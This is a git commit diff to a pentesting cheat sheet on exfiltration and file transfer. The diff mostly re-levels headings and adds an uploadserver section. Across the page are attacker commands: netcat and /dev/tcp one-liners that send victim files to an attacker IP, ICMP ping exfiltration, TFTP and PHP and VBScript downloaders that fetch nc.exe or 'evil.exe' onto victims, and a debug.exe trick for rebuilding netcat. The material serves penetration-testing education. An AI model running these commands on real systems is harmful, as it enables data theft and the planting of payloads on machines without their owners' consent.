Add exfiltration HTTP upload file module
+ Enhance layout
This commit is contained in:
parent
3b21650868
commit
9a964a3bc7
@ -17,7 +17,7 @@
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
### Copy\&Paste Base64
|
||||
## Copy\&Paste Base64
|
||||
|
||||
**Linux**
|
||||
|
||||
@ -33,7 +33,7 @@ certutil -encode payload.dll payload.b64
|
||||
certutil -decode payload.b64 payload.dll
|
||||
```
|
||||
|
||||
### HTTP
|
||||
## HTTP
|
||||
|
||||
**Linux**
|
||||
|
||||
@ -61,13 +61,25 @@ Start-BitsTransfer -Source $url -Destination $output
|
||||
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
||||
```
|
||||
|
||||
#### Upload files
|
||||
### Upload files
|
||||
|
||||
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
||||
- [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
||||
- [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
|
||||
- Python module [uploadserver](https://pypi.org/project/uploadserver/):
|
||||
```bash
|
||||
# Listen to files
|
||||
python3 -m pip install --user uploadserver
|
||||
python3 -m uploadserver
|
||||
# With basic auth:
|
||||
# python3 -m uploadserver --basic-auth hello:world
|
||||
|
||||
[**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)\*\*\*\*
|
||||
# Send a file
|
||||
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
|
||||
# With basic auth:
|
||||
# curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
|
||||
```
|
||||
|
||||
#### **HTTPS Server**
|
||||
### **HTTPS Server**
|
||||
|
||||
```python
|
||||
# from https://gist.github.com/dergachev/7028596
|
||||
@ -110,23 +122,23 @@ if __name__ == "__main__":
|
||||
###
|
||||
```
|
||||
|
||||
### FTP
|
||||
## FTP
|
||||
|
||||
#### FTP server (python)
|
||||
### FTP server (python)
|
||||
|
||||
```bash
|
||||
pip3 install pyftpdlib
|
||||
python3 -m pyftpdlib -p 21
|
||||
```
|
||||
|
||||
#### FTP server (NodeJS)
|
||||
### FTP server (NodeJS)
|
||||
|
||||
```
|
||||
sudo npm install -g ftp-srv --save
|
||||
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
||||
```
|
||||
|
||||
#### FTP server (pure-ftp)
|
||||
### FTP server (pure-ftp)
|
||||
|
||||
```bash
|
||||
apt-get update && apt-get install pure-ftp
|
||||
@ -146,7 +158,7 @@ chown -R ftpuser:ftpgroup /ftphome/
|
||||
/etc/init.d/pure-ftpd restart
|
||||
```
|
||||
|
||||
#### **Windows** client
|
||||
### **Windows** client
|
||||
|
||||
```bash
|
||||
#Work well with python. With pure-ftp use fusr:ftp
|
||||
@ -164,7 +176,7 @@ ftp -n -v -s:ftp.txt
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
### SMB
|
||||
## SMB
|
||||
|
||||
Kali as server
|
||||
|
||||
@ -202,7 +214,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
|
||||
WindPS-2> cd new_disk:
|
||||
```
|
||||
|
||||
### SCP
|
||||
## SCP
|
||||
|
||||
The attacker has to have SSHd running.
|
||||
|
||||
@ -210,7 +222,7 @@ The attacker has to have SSHd running.
|
||||
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||||
```
|
||||
|
||||
### SSHFS
|
||||
## SSHFS
|
||||
|
||||
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
|
||||
|
||||
@ -220,23 +232,23 @@ sudo mkdir /mnt/sshfs
|
||||
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
|
||||
```
|
||||
|
||||
### NC
|
||||
## NC
|
||||
|
||||
```bash
|
||||
nc -lvnp 4444 > new_file
|
||||
nc -vn <IP> 4444 < exfil_file
|
||||
```
|
||||
|
||||
### /dev/tcp
|
||||
## /dev/tcp
|
||||
|
||||
#### Download file from victim
|
||||
### Download file from victim
|
||||
|
||||
```bash
|
||||
nc -lvnp 80 > file #Inside attacker
|
||||
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
|
||||
```
|
||||
|
||||
#### Upload file to victim
|
||||
### Upload file to victim
|
||||
|
||||
```bash
|
||||
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
|
||||
@ -247,7 +259,7 @@ cat <&6 > file.txt
|
||||
|
||||
thanks to **@BinaryShadow\_**
|
||||
|
||||
### **ICMP**
|
||||
## **ICMP**
|
||||
|
||||
```bash
|
||||
# To exfiltrate the content of a file via pings you can do:
|
||||
@ -267,7 +279,7 @@ def process_packet(pkt):
|
||||
sniff(iface="tun0", prn=process_packet)
|
||||
```
|
||||
|
||||
### **SMTP**
|
||||
## **SMTP**
|
||||
|
||||
If you can send data to an SMTP server, you can create an SMTP to receive the data with python:
|
||||
|
||||
@ -275,7 +287,7 @@ If you can send data to an SMTP server, you can create an SMTP to receive the da
|
||||
sudo python -m smtpd -n -c DebuggingServer :25
|
||||
```
|
||||
|
||||
### TFTP
|
||||
## TFTP
|
||||
|
||||
By default in XP and 2003 (in others it needs to be explicitly added during installation)
|
||||
|
||||
@ -301,7 +313,7 @@ In **victim**, connect to the Kali server:
|
||||
tftp -i <KALI-IP> get nc.exe
|
||||
```
|
||||
|
||||
### PHP
|
||||
## PHP
|
||||
|
||||
Download a file with a PHP oneliner:
|
||||
|
||||
@ -309,7 +321,7 @@ Download a file with a PHP oneliner:
|
||||
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
||||
```
|
||||
|
||||
### VBScript
|
||||
## VBScript
|
||||
|
||||
```bash
|
||||
Attacker> python -m SimpleHTTPServer 80
|
||||
@ -349,7 +361,7 @@ echo ts.Close >> wget.vbs
|
||||
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
|
||||
```
|
||||
|
||||
### Debug.exe
|
||||
## Debug.exe
|
||||
|
||||
This is a crazy technique that works on Windows 32 bit machines. The idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
|
||||
|
||||
@ -367,7 +379,7 @@ wine exe2bat.exe nc.exe nc.txt
|
||||
|
||||
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
|
||||
|
||||
### DNS
|
||||
## DNS
|
||||
|
||||
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user